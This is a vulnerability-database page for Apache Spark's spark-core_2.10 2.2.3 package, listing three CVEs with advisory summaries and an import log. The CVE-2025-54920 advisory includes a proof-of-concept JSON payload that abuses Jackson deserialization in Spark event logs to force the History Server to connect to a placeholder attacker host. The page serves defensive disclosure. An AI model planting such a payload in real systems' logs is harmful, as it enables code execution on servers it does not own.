Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:maven/org.apache.spark/spark-core_2.10@2.2.3
purl pkg:maven/org.apache.spark/spark-core_2.10@2.2.3
Next non-vulnerable version None.
Latest non-vulnerable version None.
Risk 4.5
Vulnerabilities affecting this package (2)
Vulnerability Summary Fixed by
VCID-1gtx-thb1-9ud6
Aliases:
CVE-2025-54920
GHSA-jwp6-cvj8-fw65
Apache Spark: Spark History Server Code Execution Vulnerability This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue. ## Summary Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server. ## Details The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization. The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability. ## Proof of Concept: 1. Run Spark with event logging enabled, writing to a writable directory (spark-logs). 2. Inject the following JSON at the beginning of an event log file: ``` { "Event": "org.apache.hive.jdbc.HiveConnection", "uri": "jdbc:hive2://<IP>:<PORT>/", "info": { "hive.metastore.uris": "thrift://<IP>:<PORT>" } } ``` 3. Start the Spark History Server with logs pointing to the modified directory. 4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection. ## Impact An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system. There are no reported fixed by versions.
VCID-as3y-ffvw-rube
Aliases:
CVE-2018-17190
GHSA-phg2-9c5g-m4q7
Improper Authentication In all versions of Apache Spark, the standalone resource manager accepts code to execute on a `master` host, that then runs that code on `worker` hosts. The master itself does not, by design, execute user code. A specially-crafted request to the master can, however, cause the master to execute code too. Note that this does not affect standalone clusters with authentication enabled. While the master host typically has less outbound access to other resources than a worker, the execution of code on the master is nevertheless unexpected. There are no reported fixed by versions.
Vulnerabilities fixed by this package (1)
Vulnerability Summary Aliases
VCID-pa42-1gk4-9yhj Improper Authentication Apache Spark standalone master exposes a REST API for job submission, in addition to the submission mechanism used by spark-submit. In standalone, the config property `spark.authenticate.secret` establishes a shared secret for authenticating requests to submit jobs via spark-submit. However, the REST API does not use this or any other authentication mechanism, and this is not adequately documented. In this case, a user would be able to run a driver program without authenticating, but not launch executors, using the REST API. CVE-2018-11770
GHSA-w4r4-65mg-45x2

Date Actor Action Vulnerability Source VulnerableCode Version
2026-04-18T04:14:54.147372+00:00 GitLab Importer Affected by VCID-1gtx-thb1-9ud6 https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2025-54920.yml 38.4.0
2026-04-16T20:50:21.908802+00:00 GitLab Importer Affected by VCID-as3y-ffvw-rube https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2018-17190.yml 38.4.0
2026-04-16T20:49:48.351495+00:00 GitLab Importer Fixing VCID-pa42-1gk4-9yhj https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2018-11770.yml 38.4.0
2026-04-11T22:01:00.833727+00:00 GitLab Importer Affected by VCID-as3y-ffvw-rube https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2018-17190.yml 38.3.0
2026-04-11T22:00:46.399542+00:00 GitLab Importer Fixing VCID-pa42-1gk4-9yhj https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2018-11770.yml 38.3.0
2026-04-02T22:14:03.089404+00:00 GitLab Importer Affected by VCID-as3y-ffvw-rube https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2018-17190.yml 38.1.0
2026-04-02T22:13:50.231428+00:00 GitLab Importer Fixing VCID-pa42-1gk4-9yhj https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2018-11770.yml 38.1.0
2026-04-02T17:01:08.828736+00:00 GHSA Importer Affected by VCID-1gtx-thb1-9ud6 https://github.com/advisories/GHSA-jwp6-cvj8-fw65 38.1.0
2026-04-01T16:31:33.616749+00:00 GitLab Importer Affected by VCID-as3y-ffvw-rube https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2018-17190.yml 38.0.0
2026-04-01T16:31:19.925570+00:00 GitLab Importer Fixing VCID-pa42-1gk4-9yhj https://gitlab.com/gitlab-org/advisories-community/-/blob/main/maven/org.apache.spark/spark-core_2.10/CVE-2018-11770.yml 38.0.0